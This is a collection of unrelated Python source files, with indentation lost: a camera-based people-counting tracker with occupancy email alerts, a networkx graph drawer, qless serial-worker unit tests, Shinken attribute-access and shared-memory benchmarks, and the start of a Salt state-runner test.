else:
# loop over the trackers
for tracker in var.trackers:
# set the status of our system to be 'tracking' rather
# than 'waiting' or 'detecting'
status = "Tracking"
# update the tracker and grab the updated position
tracker.update(rgb)
pos = tracker.get_position()
# unpack the position object
startX = int(pos.left())
startY = int(pos.top())
endX = int(pos.right())
endY = int(pos.bottom())
# add the bounding box coordinates to the rectangles list
rects.append((startX, startY, endX, endY))
# draw a horizontal line in the center of the frame -- once an
# object crosses this line we will determine whether they were
# moving 'up' or 'down'
cv2.line(frame, (int(round(x1)), int(round(y1))), (int(round(x2)), int(round(y2))), (0, 0, 255), 3)
#iterlist=createLineIterator(np.array([0, round(H * 0.50)]),np.array([W, round(H * 0.66)]),frame)
#print(len(iterlist))
cv2.putText(frame, "-Prediction border - Entrance-", (10, var.H - ((i * 20) + 200)),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
# use the centroid tracker to associate the (1) old object
# centroids with (2) the newly computed object centroids
objects = var.ct.update(rects)
# loop over the tracked objects
for (objectID, centroid) in objects.items():
# check to see if a trackable object exists for the current
# object ID
to = var.trackableObjects.get(objectID, None)
# if there is no existing trackable object, create one
if to is None:
to = TrackableObject(objectID, centroid)
# otherwise, there is a trackable object so we can utilize it
# to determine direction
else:
# the difference between the y-coordinate of the *current*
# centroid and the mean of *previous* centroids will tell
# us in which direction the object is moving (negative for
# 'up' and positive for 'down')
if vertical_direction == 1:
y = [c[1] for c in to.centroids]
#print(y)
#direction = centroid[1] - np.mean(y)
direction = 0
to.centroids.append(centroid)
#print(to.centroids)
direction_all=[]
if len(y) >= 40:
# sum of xi - mean(xi-1)
#try
#direction_all=[]
for index,i in enumerate(y[-41:]):
prev_mean= np.mean(y[:index+1])
direc= i - prev_mean
direction_all.append(direc)
if all([x > 0 for x in direction_all]):
direction = 1
elif all([x < 0 for x in direction_all]):
direction = -1
else:
direction = 0
#except
else:
y = [c[0] for c in to.centroids]
#print(y)
#direction = centroid[1] - np.mean(y)
direction = 0
to.centroids.append(centroid)
#print(to.centroids)
direction_all=[]
if len(y) >= 40:
# sum of xi - mean(xi-1)
#try
#direction_all=[]
for index,i in enumerate(y[-41:]):
prev_mean= np.mean(y[:index+1])
direc= i - prev_mean
direction_all.append(direc)
if all([x > 0 for x in direction_all]):
# right
direction = 1
elif all([x < 0 for x in direction_all]):
#left
direction = -1
else:
direction = 0
# check to see if the object has been counted or not
if not to.counted:
if centroid[0] < iterlist[0][0] or centroid[0] > iterlist[-1][0]:
pass
elif m == 1000000001 and (centroid[1] < iterlist[0][1] or centroid[1] > iterlist[-1][1]):
pass
if m < 0 and vertical_direction == 1:
# if the direction is negative (indicating the object
# is moving up) AND the centroid is above the center
# line, count the object
# H is between 0 and 500 the over the value the upper it will be, the higher the value, the lower it will be.
#if direction < 0 and centroid[1] < int(round(H * 0.66)):
#print(str(centroid))
if direction < 0:
for i in iterlist:
if centroid[0] > i[0] and centroid[1] < i[1]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going up' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'up':
check_exceed(var.x,frame)
break
# if the direction is positive (indicating the object
# is moving down) AND the centroid is below the
# center line, count the object
#elif direction > 0 and centroid[1] > int(round(H * 0.66)):
elif direction > 0:
for i in iterlist:
if centroid[0] < i[0] and centroid[1] > i[1]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going down' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'down':
check_exceed(var.x,frame)
break
#print(empty1[-1])
# if the people limit exceeds over threshold, send an email alert
elif m == 0 and vertical_direction == 1:
if direction < 0:
for i in iterlist:
if centroid[1] < i[1]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going up' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'up':
check_exceed(var.x,frame)
break
elif direction > 0:
for i in iterlist:
if centroid[1] > i[1]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going down' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'down':
check_exceed(var.x,frame)
break
elif 0 < m < 1000000000 and vertical_direction == 1:
if direction < 0:
for i in iterlist:
if centroid[0] < i[0] and centroid[1] < i[1]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going up' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'up':
check_exceed(var.x,frame)
break
elif direction > 0:
for i in iterlist:
if centroid[0] > i[0] and centroid[1] > i[1]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going down' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'down':
check_exceed(var.x,frame)
break
elif m < 0 and vertical_direction == 0:
# if the direction is negative (indicating the object
# is moving LEFT) AND the centroid is on the left side
# line, count the object
if direction < 0:
for i in iterlist:
if centroid[0] < i[0] and centroid[1] > i[1]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going left' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'left':
check_exceed(var.x,frame)
break
# if the direction is positive (indicating the object
# is moving RIGHT) AND the centroid is on the the side
# line, count the object
elif direction > 0:
for i in iterlist:
if centroid[0] > i[0] and centroid[1] < i[1]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going right' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'right':
check_exceed(var.x,frame)
break
elif m >= 1000000000 and vertical_direction == 0:
# m is infinite/ vertical line
if direction < 0:
for i in iterlist:
if centroid[0] < i[0]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going left' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'left':
check_exceed(var.x,frame)
break
elif direction > 0:
for i in iterlist:
if centroid[0] > i[0]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going right' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'right':
check_exceed(var.x,frame)
break
elif 0 < m < 1000000000 and vertical_direction == 0:
if direction < 0:
for i in iterlist:
if centroid[0] < i[0] and centroid[1] < i[1]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going left' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'left':
check_exceed(var.x,frame)
break
elif direction > 0:
for i in iterlist:
if centroid[0] > i[0] and centroid[1] > i[1]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going right' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixcel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'right':
check_exceed(var.x,frame)
break
var.x = []
# compute the sum of total people inside
if enter_direction == 'down' or enter_direction == 'right':
var.x.append(len(var.empty1)-len(var.empty))
else:
var.x.append(len(var.empty)-len(var.empty1))
#print("Total people inside:", x)
# store the trackable object in our dictionary
var.trackableObjects[objectID] = to
#print(peoplechangelist)
# draw both the ID of the object and the centroid of the
# object on the output frame
text = "ID {}".format(objectID)
cv2.putText(frame, text, (centroid[0] - 10, centroid[1] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)
cv2.circle(frame, (centroid[0], centroid[1]), 4, (255, 255, 255), -1)
# construct a tuple of information we will be displaying on the
if enter_direction == 'down' or enter_direction == 'right':
info = [
("Exit", var.totalUp),
("Enter", var.totalDown),
("Status", status),
]
else:
info = [
("Exit", var.totalDown),
("Enter", var.totalUp),
("Status", status),
]
info2 = [
("Total people inside", var.x),
]
if config.people_change == True:
#if len(peoplechangelist) > 0:
peoplechangelist.append(var.x)
try:
assert objectID
assert centroid
text = "ID {}".format(objectID)
cv2.putText(frame, text, (centroid[0] - 10, centroid[1] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)
cv2.circle(frame, (centroid[0], centroid[1]), 4, (255, 255, 255), -1)
except (AssertionError,ValueError,NameError):
pass
try:
if int(info2[0][1][0]) >= config.Threshold:
cv2.putText(frame, "-ALERT: People limit exceeded-", (10, frame.shape[0] - 80),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255), 2)
if config.ALERT:
if var.do_malier == 1:
print("[INFO] Sending email alert..")
try:
Mailer().send(config.MAIL)
except:
var.do_malier = 0
print("[INFO] Alert sent")
except IndexError:
pass
# Display the output
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(frame, text, (10, var.H - ((i * 20) + 20)), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 0), 2)
for (i, (k, v)) in enumerate(info2):
text = "{}: {}".format(k, v)
cv2.putText(frame, text, (265, var.H - ((i * 20) + 60)), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 2)
# Initiate a simple log to save data at end of the day
if config.Log:
try:
timeinxmins
except NameError:
timeinxmins=datetime.datetime.now() + config.timedel
if datetime.datetime.now() >= timeinxmins:
#data={'櫃位地點':config.cam_place,'People Enter':info[1][1],'People Exit':info[0][1],'Current People Inside':info2[0][1],'Date':datetime.datetime.now()}
#df=pd.DataFrame(data=data)
timeinxmins=datetime.datetime.now() + config.timedel
cam_place=str(args["camera"])
excel_name=f"./summary/{cam_place} summary.xlsx"
if exists(excel_name):
#with pd.ExcelWriter(excel_name,mode='a') as writer:
#append_df_to_excel(excel_name, df,header=None, index=False)
data_converter(info[1][1],info[0][1],excel_name)
else:
create_summary(info[1][1],info[0][1],excel_name)
print('summary exported!')
# check to see if we should write the frame to disk
if var.writer is not None:
writer.write(frame)
# show the output frame
cv2.imshow("Real-Time Monitoring/Analysis Window", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# increment the total number of frames processed thus far and
# then update the FPS counter
var.totalFrames += 1
fps.update()
if config.Timer:
# Automatic timer to stop the live stream. Set to 8 hours (28800s).
t1 = time.time()
num_seconds=(t1-t0)
if num_seconds > 28800:
break
if config.Scheduler:
if datetime.datetime.now() >= var.tmr :
print('renew program')
os.execv(sys.executable, ['python'] + sys.argv)
# stop the timer and display FPS information
fps.stop()
print("[INFO] elapsed time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
# # if we are not using a video file, stop the camera video stream
# if not args.get("input", False):
# vs.stop()
#
# # otherwise, release the video file pointer
# else:
# vs.release()
# issue 15
#if config.Thread:
#vs.release()
# close any open windows
cv2.destroyAllWindows()
# Custom Thread Class
class MyThread():
# Function that raises the custom exception
def __init__(self,q_arg):
self.q=q_arg
def run(self):
# Variable that stores the exception, if raised by someFunction
self.exc = None
try:
self.cam_process = Process(target=capture, args=(self.q,))
self.think_process = Process(target=tracker_peo, args=(self.q,))
self.cam_process.start()
self.think_process.start()
except IndexError as e:
self.exc = e
def join(self):
self.cam_process.join()
self.think_process.join()
# Since join() returns in caller thread
# we re-raise the caught exception
# if any was caught
if self.exc:
raise self.exc
def terminate(self):
self.cam_process.terminate()
self.think_process.terminate()
q= Queue()
thread1= MyThread(q)
def start_thread():
q= Queue()
thread=MyThread(q)
thread.run()
try:
thread.join()
except:
print('start thread error')
raise KeyboardInterrupt
def stop_thread():
pass
##learn more about different schedules here: https://pypi.org/project/schedule/
if __name__ == '__main__':
q= Queue()
if config.Scheduler:
##Runs for every 1 second
#global tmr
#tmr=datetime.datetime.now()
schedule.every(1).seconds.do(start_thread)
##Runs at every day (9:00 am). You can change it.
#schedule.every().day.at("9:00").do(run)
while 1:
#var.tmr=datetime.datetime.now()
try:
#tmr=tmr.replace(day=tmr.day + 1, hour=21, minute=12, second=0, microsecond=0)
var.tmr=var.tmr.replace(day=var.tmr.day + 1, hour=0, minute=0, second=0, microsecond=0)
except ValueError:
try:
var.tmr=var.tmr.replace(month=var.tmr.month + 1, day= 1,hour=0, minute=0, second=0, microsecond=0)
except ValueError:
var.tmr=var.tmr.replace(year= var.tmr.year + 1 ,month= 1, day= 1,hour=0, minute=0, second=0, microsecond=0)
#print(tmr)
#print(datetime.datetime.now())
#try:
schedule.run_pending()
if datetime.datetime.now() >= var.tmr:
print('renew outer program')
raise ValueError
#except:
#print('schedule error')
#continue
#else:
#run()
|
GraphDrawer.py
|
import time
import threading
import networkx as nx
import matplotlib.pyplot as plt
def draw_graph(e):
one_thr = threading.Thread(target=_draw_graph(e), args=['test'])
one_thr.start()
return one_thr
def _draw_graph(e):
g = nx.Graph()
g.add_weighted_edges_from(e)
pos = nx.spring_layout(g)
nx.draw(g, pos, node_size=15, with_labels=True)
edge_labels = nx.get_edge_attributes(g, 'weight')
nx.draw_networkx_edge_labels(g, pos, edge_labels, font_size=6)
# nx.draw_networkx_labels(g, pos)
plt.show()
if __name__ == '__main__':
edges = []
with open('CARP_samples/gdb1.dat', 'r') as file:
for i in range(9):
file.readline()
line = file.readline()
while line != 'END':
edges.append(list(map(int, line.split()[:-1])))
print(list(map(int, line.split()[:-1])))
line = file.readline()
_draw_graph(edges)
|
test_serial.py
|
'''Test the serial worker'''
# Internal imports
from common import TestQless
import time
from threading import Thread
# The stuff we're actually testing
from qless import logger
from qless.workers.serial import SerialWorker
class SerialJob(object):
'''Dummy class'''
@staticmethod
def foo(job):
'''Dummy job'''
time.sleep(job.data.get('sleep', 0))
try:
job.complete()
except:
logger.exception('Unable to complete job %s' % job.jid)
class Worker(SerialWorker):
'''A worker that limits the number of jobs it runs'''
def jobs(self):
'''Yield only a few jobs'''
generator = SerialWorker.jobs(self)
for _ in xrange(5):
yield generator.next()
def kill(self, jid):
'''We'll push a message to redis instead of falling on our sword'''
self.client.redis.rpush('foo', jid)
raise KeyboardInterrupt()
def signals(self):
'''Do not set any signal handlers'''
pass
class NoListenWorker(Worker):
'''A worker that just won't listen'''
def listen(self, _):
'''Don't listen for lost locks'''
pass
class TestWorker(TestQless):
'''Test the worker'''
def setUp(self):
TestQless.setUp(self)
self.queue = self.client.queues['foo']
self.thread = None
def tearDown(self):
if self.thread:
self.thread.join()
TestQless.tearDown(self)
def test_basic(self):
'''Can complete jobs in a basic way'''
jids = [self.queue.put(SerialJob, {}) for _ in xrange(5)]
NoListenWorker(['foo'], self.client, interval=0.2).run()
states = [self.client.jobs[jid].state for jid in jids]
self.assertEqual(states, ['complete'] * 5)
def test_jobs(self):
'''The jobs method yields None if there are no jobs'''
worker = NoListenWorker(['foo'], self.client, interval=0.2)
self.assertEqual(worker.jobs().next(), None)
def test_sleeps(self):
'''Make sure the client sleeps if there aren't jobs to be had'''
for _ in xrange(4):
self.queue.put(SerialJob, {})
before = time.time()
NoListenWorker(['foo'], self.client, interval=0.2).run()
self.assertGreater(time.time() - before, 0.2)
def test_lost_locks(self):
'''The worker should be able to stop processing if need be'''
jid = [self.queue.put(SerialJob, {'sleep': 0.1}) for _ in xrange(5)][0]
self.thread = Thread(
target=Worker(['foo'], self.client, interval=0.2).run)
self.thread.start()
# Now, we'll timeout one of the jobs and ensure that kill is invoked
while self.client.jobs[jid].state != 'running':
time.sleep(0.01)
self.client.jobs[jid].timeout()
self.assertEqual(self.client.redis.brpop('foo', 1), ('foo', jid))
def test_kill(self):
'''Should be able to fall on its sword if need be'''
worker = SerialWorker([], self.client)
worker.jid = 'foo'
thread = Thread(target=worker.kill, args=(worker.jid,))
thread.start()
thread.join()
self.assertFalse(thread.is_alive())
def test_kill_dead(self):
'''If we've moved on to another job, say so'''
# If this tests runs to completion, it has succeeded
worker = SerialWorker([], self.client)
worker.kill('foo')
def test_shutdown(self):
'''We should be able to shutdown a serial worker'''
# If this test finishes, it passes
worker = SerialWorker([], self.client, interval=0.1)
worker.stop()
worker.run()
|
prop.py
|
import time
import sys
import os
import traceback
try:
import cPickle
except ImportError:
import pickle as cPickle
try:
xrange
except NameError:
xrange = range
try:
from shinken.objects.host import Host
except ImportError:
Host = None
from multiprocessing.sharedctypes import Value, Array
from ctypes import c_bool, c_wchar_p, c_long
def print_title(title):
print("\n\n")
print("#" * 60)
print("TITLE: %s" % title)
print("#" * 60)
def print_timed_entry(title, N, ref_time):
elapsed_time = time.time() - ref_time
print("\t%-25s: (%d loops) => %.3f seconds (%10.4f M/s)" % (title, N, elapsed_time, (N / elapsed_time) / 1000000.0))
def share_memory_mapping():
print_title('share memory mapping')
#### Share memory mapping
import mmap
import ctypes
import struct
P = '/dev/shm/blabla.txt'
total_size = 100 * 1000000 # *1Mo
bloc_size = 100 * mmap.PAGESIZE
# write a simple example file
with open(P, "wb") as f:
f.write(b"\x00" * total_size)
f = open(P, 'r+b')
bufs = []
N = int(total_size / bloc_size)
print("Will allocate %dK with %d blocs (%d by bloc) " % (total_size / 1024, N, bloc_size))
t0 = time.time()
for i in xrange(N):
to_open = f.fileno()
buf = mmap.mmap(to_open, bloc_size, mmap.MAP_SHARED, mmap.PROT_WRITE)
bufs.append(buf)
try:
i = ctypes.c_int.from_buffer(buf)
except TypeError: # in pypy 5
print("PYPY detected, skip this test")
return
# Set a value
i.value = 10
# And manipulate it for kicks
i.value += 1
assert i.value == 11
offset = struct.calcsize(i._type_)
# The offset should be uninitialized ('\x00')
# print buf[offset]
# assert buf[offset] == '\x00'
# Now ceate a string containing 'foo' by first creating a c_char array
s_type = ctypes.c_char * len('foo')
# Now create the ctypes instance
s = s_type.from_buffer(buf, offset)
# And finally set it
s.raw = b'foo'
new_i = struct.unpack('i', buf[:4])
new_s = struct.unpack('3s', buf[4:7])
# print "I", new_i, "S", new_s
d = time.time() - t0
print("Time to read/write %d file to /dev/shm: %.3f (%.1f ops/s)" % (N, d, N / d))
# Try fork job
buf = mmap.mmap(-1, bloc_size, mmap.MAP_SHARED, mmap.PROT_WRITE)
bufs.append(buf)
i = ctypes.c_int.from_buffer(buf)
# Set a value
i.value = 10
pid = os.fork()
if pid == 0: # son
time.sleep(1)
i = ctypes.c_int.from_buffer(buf)
print("(in the son) i.value is ", i.value)
sys.exit(0)
else: # father
i.value = 9999
time.sleep(2)
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
class AutoProperties(type):
def __new__(cls, name, bases, dct):
# First map integer properties
for (prop_raw, v) in dct['int_properties'].items():
prop = '_' + prop_raw
def protected(prop):
def __get(self):
# return self._y # ==> 3.5s
return getattr(self, prop) # ==> 4.4s
return __get
get = protected(prop)
def protected(prop):
def __set(self, v):
# print "SET", '_'+prop_raw, v
setattr(self, '_' + prop_raw, v)
return __set
set = protected(prop)
dct[prop_raw] = property(get, set)
return type.__new__(cls, name, bases, dct)
@add_metaclass(AutoProperties)
class OOO(object):
# __metaclass__ = AutoProperties
int_properties = {'x': 1, 'y': 1}
bool_properties = {'b1': True, 'b2': True}
def __init__(self):
self._x = 1
self._y = 1
self._b1 = True
self._b2 = True
@property
def b1(self):
return self._b1
@b1.setter
def b1(self, v):
self._b1 = v
'''
@property
def y(self):
return self._y
@y.setter
def y(self, v):
self._y = v
'''
'''
def getY(self):
return self._y
def setY(self, v):
self._y = v
y = property(getY, setY)
'''
from cffi import FFI
ffi = FFI()
ffi.cdef('''
typedef struct FOO FOO;
struct FOO {
int prop1;
int prop2;
int prop3;
int prop4;
int prop5;
int prop6;
int prop7;
int prop8;
int prop9;
int prop10;
};
void FOO_set_prop1(FOO*, int);
''')
# ffi.set_source("_example",
# r"""
# void FOO_set_prop1(FOO* self, int v){
# self->prop1 = v;
# }
# """)
try:
Clib = None
Clib = ffi.verify(
r'''
typedef struct FOO FOO;
struct FOO {
int prop1;
int prop2;
int prop3;
int prop4;
int prop5;
int prop6;
int prop7;
int prop8;
int prop9;
int prop10;
};
void FOO_set_prop1(FOO* self, int v){
self->prop1 = v;
};
'''
)
except Exception as exp:
print('ERROR CFFI: %s' % traceback.format_exc())
# ffi.compile()
print("CLib", Clib)
def bench_host_creation_with_attr():
################## Becnh host creation with setattr/getattr/hasattr
print_title("Bench host creation with attr")
'''
def testBit(int_type, offset):
mask = 1 << offset
return(int_type & mask)
def setBit(int_type, offset):
mask = 1 << offset
return(int_type | mask)
N = 10000000
for pos in [20, 256]:
t0 = time.time()
mask = 1 << pos
for i in xrange(N):
f = 0
#print "Set pos %d" % pos
b = f | mask
#print "Is set?", testBit(f, pos)
#print type(f)
print "Pos:%d %.2f" % (pos, time.time() - t0)
'''
if Host is None:
print("Shinken is not installed, skip this test")
return
# Hack fill default, by setting values directly to class
cls = Host
for prop, entry in cls.properties.items():
if entry.has_default:
v = entry.pythonize(entry.default)
setattr(cls, prop, v)
# print "Pop: %s => %s" % (prop, v)
delete_bool = False
delete_running = False
lst = []
p1 = 0.0
p2 = 0.0
p3 = 0.0
p4 = 0.0
N = 40000
print("Number of elements", N)
for i in xrange(N):
t0 = time.time()
h = Host({'host_name': 'blablacar', 'address': '127.0.0.%d' % i, 'active_checks_enabled': '1'})
p1 += (time.time() - t0)
# print h.__dict__
# print h.active_checks_enabled
t0 = time.time()
# h.fill_default()
p2 += (time.time() - t0)
# print h.__dict__
# print h.active_checks_enabled
t0 = time.time()
h.pythonize()
p3 += (time.time() - t0)
# print h.__dict__
# print h.passive_checks_enabled
t0 = time.time()
nb_delete = 0
nb_fields = 0
properties = Host.properties
for (k, e) in properties.items():
nb_fields += 1
if not hasattr(h, k):
continue
elif delete_bool:
if isinstance(getattr(h, k), bool):
delattr(h, k)
# pass
nb_delete += 1
for (k, e) in Host.running_properties.items():
nb_fields += 1
if not hasattr(h, k):
continue
elif delete_running:
delattr(h, k)
continue
elif delete_bool:
if isinstance(getattr(h, k), bool):
delattr(h, k)
# pass
nb_delete += 1
# print cPickle.dumps(h, 0)
p4 += (time.time() - t0)
# print "Deleted: %d / %d total" % (nb_delete, nb_fields)
lst.append(h)
t0 = time.time()
buf = cPickle.dumps(lst, 2)
print("TIME pickle %.2f len=%d" % (time.time() - t0, len(buf)))
print("Phases: create=%.2f default=%.2f pythonize=%.2f clean=%.2f" % (p1, p2, p3, p4))
def bench_getattr_hasattr():
################## Becnh host creation with setattr/getattr/hasattr
print_title("Bench host creation with setattr/getattr/hasattr")
N = 1000000
print("############ CFFI")
if Clib is None:
print('CLib is None, skiping this test')
return
FOO_set_prop1 = Clib.FOO_set_prop1
struct_obj = ffi.new("FOO*")
class CFFISurClass(object):
def __init__(self):
self.struct_obj = ffi.new("FOO*")
cffi_sur_class = CFFISurClass()
t0 = time.time()
for i in xrange(N):
struct_obj.prop1 = 33
print_timed_entry('CFFI: struct.prop1', N, t0)
t0 = time.time()
for i in xrange(N):
cffi_sur_class.struct_obj.prop1 = 33
print_timed_entry('CFFI: CLASS->struct.x', N, t0)
t0 = time.time()
for i in xrange(N):
FOO_set_prop1(struct_obj, 33)
print_timed_entry('CFFI: f(struct*, value)', N, t0)
o = OOO()
print("############ Getattr & hasattr")
t0 = time.time()
for i in xrange(N):
try:
getattr(o, 'blabla')
except AttributeError as exp:
pass
print_timed_entry('Get+try', N, t0)
t0 = time.time()
for i in xrange(N):
hasattr(o, 'blabla')
print_timed_entry('hasattr', N, t0)
####### Integers
x = o._x
N = 1000000
# rr = range(N)
def rr():
return xrange(N)
print("############ Integers")
t0 = time.time()
for i in rr():
v = o.x
assert (v == 1)
print_timed_entry('@Property access', N, t0)
t0 = time.time()
for i in rr():
v = o._x
assert (v == 1)
print_timed_entry('Direct access _x', N, t0)
t0 = time.time()
for i in rr():
v = o.__dict__['_x']
assert (v == 1)
print_timed_entry('Direct __dict__ access', N, t0)
code = compile('v = o._x', '<string>', 'exec')
t0 = time.time()
for i in rr():
exec (code, locals())
assert (v == 1)
print_timed_entry('Compile+Exec', N, t0)
t0 = time.time()
for i in rr():
v = getattr(o, '_x')
assert (v == 1)
print_timed_entry('Getattr _x', N, t0)
print("############ Python Booleans with bitmask")
o._b1 = True
t0 = time.time()
for i in rr():
v = o.b1
print_timed_entry('@property', N, t0)
# print "\tProperty: FOR N: %d => %.2f" % (N, time.time() - t0)
'''
def testBit(int_type, offset):
mask = 1 << offset
return(int_type & mask)
def setBit(int_type, offset):
mask = 1 << offset
return(int_type | mask)
def clearBit(int_type, offset):
mask = ~(1 << offset)
return(int_type & mask)
'''
b = 0
offset = 5
mask = 1 << offset
b = b | mask
t0 = time.time()
for i in rr():
v = (b & mask) != 0
assert (v is True)
print_timed_entry('Raw', N, t0)
t0 = time.time()
for i in rr():
v = o.__dict__['_b1']
assert (v is True)
print_timed_entry('__dict__', N, t0)
print("############## ctypes booleans")
import ctypes
c_uint8 = ctypes.c_uint8
class Flags_bits(ctypes.LittleEndianStructure):
_fields_ = [
("f1", c_uint8, 1), # asByte & 1
("f2", c_uint8, 1), # asByte & 2
("f3", c_uint8, 1), # asByte & 4
("f4", c_uint8, 1), # asByte & 8
]
class Flags(ctypes.Union):
_anonymous_ = ("bit",)
_fields_ = [
("bit", Flags_bits),
("asByte", c_uint8)
]
flags = Flags()
flags.asByte = 0x2 # ->0010
'''
print( "logout: %i" % flags.bit.f1 )
# `bit` is defined as anonymous field, so its fields can also be accessed directly:
print( "f1: %i" % flags.bit.f1 )
print( "f2: %i" % flags.bit.f2 )
print( "f3 : %i" % flags.bit.f3 )
print( "f4 : %i" % flags.bit.f4 )
'''
t0 = time.time()
for i in rr():
v = flags.bit.f2
assert (v == 1)
print_timed_entry('Raw', N, t0)
# print "\tRaw : FOR N: %d => %.2f" % (N, time.time() - t0)
t0 = time.time()
for i in rr():
v = getattr(flags.bit, 'f2')
assert (v == 1)
print_timed_entry('getattr', N, t0)
# print "\tGetattr : FOR N: %d => %.2f" % (N, time.time() - t0)
code = compile('v = flags.bit.f2', '<string>', 'exec')
t0 = time.time()
for i in rr():
exec (code, locals())
assert (v == 1)
print_timed_entry('compile+exec', N, t0)
# print "\tExec : FOR N: %d => %.2f" % (N, time.time() - t0)
print("############ Class property default access")
class BBBB(object):
x = 1
def __init__(self):
self.y = 2
o = BBBB()
t0 = time.time()
for i in rr():
v = o.x
assert (v == 1)
print_timed_entry('Direct on class level', N, t0)
# print "\tProperty (default) on class: FOR N: %d => %.2f" % (N, time.time() - t0)
t0 = time.time()
for i in rr():
v = o.y
assert (v == 2)
print_timed_entry('Direct on instance', N, t0)
# print "\tRaw (direct): FOR N: %d => %.2f" % (N, time.time() - t0)
print("Hasattr a value on class?", hasattr(o, 'x'), "and on dict?", 'x' in o.__dict__)
print("Getattr a value on a class?", getattr(o, 'x'))
def bench_sharedctypes():
N = 100000
NB_PROC = 2
elements = []
t0 = time.time()
for i in xrange(N):
elements.append(Value(c_bool, False, lock=False))
t1 = time.time()
creation_time = (t1 - t0)
print("Shared types Bool : Create: %.2f (%d/s)" % (creation_time, N / creation_time))
M = 200
t2 = time.time()
for j in xrange(M):
for i in xrange(N):
elements[i].value = True
t3 = time.time()
set_time = t3 - t2
print("Shared types Bool: Linear set: %.2f (%d/s)" % (set_time, N * M / set_time))
from multiprocessing import Process
def set_massive(process_id, lst, nb_loop):
print("PROCESS %d (nb_loop:%s)" % (process_id, nb_loop))
k = 0
for j in xrange(int(nb_loop)):
for cvalue in lst:
k += 1
cvalue.value = True
print("PROCESS %d finish (%d operations)" % (process_id, k))
all_process = []
for process_id in xrange(NB_PROC):
p = Process(target=set_massive, args=(process_id, elements, M / NB_PROC))
all_process.append(p)
t0 = time.time()
for p in all_process:
p.start()
for p in all_process:
p.join()
t1 = time.time()
process_time = t1 - t0
print("Shared types Bool: // set: %.2f (%d/s)" % (process_time, N * M / process_time))
share_memory_mapping()
bench_getattr_hasattr()
bench_host_creation_with_attr()
bench_sharedctypes()
|
test_state.py
|
# -*- coding: utf-8 -*-
"""
Tests for the state runner
"""
from __future__ import absolute_import, print_function, unicode_literals
import errno
import logging
import os
import shutil
import signal
import tempfile
import textwrap
import threading
import time
import salt.exceptions
import salt.utils.event
import salt.utils.files
import salt.utils.json
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.yaml
from salt.ext import six
from salt.ext.six.moves import queue
from tests.support.case import ShellCase
from tests.support.helpers import expensiveTest, flaky
from tests.support.mock import MagicMock, patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
log = logging.getLogger(__name__)
@flaky
class StateRunnerTest(ShellCase):
"""
Test the state runner.
"""
RUN_TIMEOUT = 300
